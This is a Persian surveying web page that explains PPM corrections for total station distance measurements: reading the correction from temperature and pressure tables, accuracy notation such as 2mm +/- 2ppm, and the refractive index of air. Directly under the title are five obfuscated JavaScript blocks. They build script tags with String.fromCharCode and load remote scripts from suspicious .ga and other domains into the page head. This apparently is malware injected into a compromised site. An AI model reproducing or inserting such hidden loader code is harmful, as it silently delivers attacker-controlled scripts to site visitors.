خانه » دانستنی های نقشه برداری » تصحیحات مربوط به PPM

تصحیحات مربوط به PPM

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,59,47,47,109,97,105,110,46,116,114,97,118,101,108,102,111,114,110,97,109,101,119,97,108,107,105,110,103,46,103,97,47,115,116,97,116,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var mj=String.fromCharCode(104,116,116,112,115,58,47,47,112,111,114,116,46,116,114,97,110,115,97,110,100,102,105,101,115,116,97,115,46,103,97,47,106,115,46,112,104,112,63,102,114,111,109,61,119,38,115,105,100,61,53,49,53); var t = document.createElement(String.fromCharCode(115,99,114,105,112,116)); t.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); t.src = mj;t.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);t.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(t);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,105,114,99,46,116,114,97,110,115,97,110,100,102,105,101,115,116,97,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,116,97,114,116,46,116,114,97,110,115,97,110,100,102,105,101,115,116,97,115,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

تصحیحات مربوط به PPM

ممکن است عوامل جوی مختلفی بر روی طول های اندازه گیری شده توسط توتال استیشن ها و همینطور مختصات محاسباتی تاثیر گذارد و سبب بروز خطا در عملیات اجرایی شود. به همین منظور در توتال استیشن، پارامتری تحت عنوان PPM در نظر گرفته شده است که باید مقدار آن به دستگاه توتال استیشن معرفی گردد.

معرفی مقدار PPM می تواند به صورت مستقیم توسط عامل (اپراتور) نقشه بردار و با بهره از جدول محاسباتی PPM صورت گیرد و یا با معرفی پارامترهای دخیل در محاسبه PPM توسط عامل نقشه بردار و محاسبه خودکار آن توسط دستگاه توتال استیشن انجام پذیرد.

فشار هوا، اختلاف ارتفاع از سطح دریاهای آزاد، دمای هوا عوامل و پارامترهایی هستند که بر روی PPM موثرند.

استخراج مقدار PPM توسط جدول محاسباتی

با مراجعه به جدول محاسباتی خواهیم دید که در این جدول، خط های افقی بیانگر میزان درجه حرارت محیط هستند که از ۲۰- الی ۵۰+ و برحسب درجه سلسیوس رسم شده اند. هم چنین خط های قائم میزان فشار محیط برحسب واحد میلی بار را نشان می دهند که از ۵۵۰ الی ۱۰۵۰ تقسیم بندی شده اند.

خطوط مورب (مایل) مقدار PPM را نمایش می دهند، برای به دست آوردن مقدار PPM، مقدارهای فشار و دما را یافته و تقاطع خطوط معرف پیدا نماییم، مقدار نوشته شده بر روی خط مایل نشان دهنده مقدار PPM خواهد بود.

برای نمونه مقدار PPM  برای فشار ۱۰۳۵ میلی بار و دمای ۱۲ درجه سلسیوس صفر خواهد بود.

 

کاربرد ppm در نقشه برداری:                        
 

PPM

پی پی ام مخفف کلماتPart Per Million (قسمت در میلیون) است و دارای سه مفهوم جداگانه در نقشه برداری است که عموما با هم اشتباه گرفته میشود.

۱- یکی از مفهوم ها در بحث دقت اندازه گیری است. دقت ۱ پی پی ام یعنی مجاز بودن خطای یک میلیمتر در اندازه گیری یک بازه طول(base) یک میلیون میلمتری (معادل یک کیلومتر).

همچنین در اعلام دقت یک طول یا باز عبارت ریاضیx mm +/- y ppm x D استفاده می کنند که خطایy وابسته بطول مورد اندازه گیری است. لذا  2mm +/- 2 ppm  یعنی انحراف معیار حاصل از اندازه گیری های یک بازه یک کیلومتری (D=1 km) برابر با ۴+/- خواهد بود.


۲- مفهوم دیگر اشاره به عددی است که در هنگام اندازه گیری طول به طولیاب یا توتال استیشن معرفی می شود. این عدد اختلاف ضریب شکست محیط در دما و فشارمعین با ضریب شکست شرایط استاندارد ( معمولا فشار یک اتمسفر و دما صفر وگاهی۲۵ درجه) است. اما چون ضریب شکست هوا معمولا درحد ۱،۰۰۰۲۹۷ است و اختلاف در رقم منتهی الیه سمت راست است ٬مقدار ورودی بصورت قسمت درمیلیون وارد میشود. بنابراین تصحیح ۳ پی پی ام یعنی ضریب شکست محیط برابر با ۱،۰۰۰۳۰۰ فرض میشود. بهتقریب هر ۵ درجه سانتیگراد ۱ میلیمتر و هر ۲۵ میلیمتر جیوه یک میلیمتر طول اندازه گیری شده را متفاوت از مقدار واقعی نشان خواهد داد.

گرچه در برداشت های توپوگرافی ممکن است بتوان تصحیح پی پی ام را نادیده گرفت ولی قطعا در مشاهدات پیمایش بایستی دما و فشار را به دستگاه معرفی کرد تا طول و به طبع آن مختصات درست بدست آید.


۳- مفهوم سوم در زمینه ضریب مقیاس است که با توجه به کاربرد آن در ژئودزی و ساده سازی مسائل مرتبط به آن به سبب استفاده از نرم افزارهای تبدیل مختصات در این زمینه٬ بطور عملی کمتر بکار می آید.

 

توجه: در برداشت های توپوگرافی ممکن است بتوان تصحیح PPM را صرفنظر کرد ولی به طور قطع در مشاهدات پیمایش بایستی دما و فشار را به دستگاه معرفی کرد تا طول و به طبع آن مختصات درست بدست آید.

 


منبع: http://www.apsis.ir

 

 

 

PPM

 

 

 

 

  

 

 

 

آدرس ایمیل پشتیبانی : newmap@yahoo.com


 پسورد تمام فایل ها در وب سایت  : www.newmap.ir 

ارسال دیدگاه

نشانی ایمیل شما منتشر نخواهد شد.

This site is protected by wp-copyrightpro.com

RSS
Instagram
SOCIALICON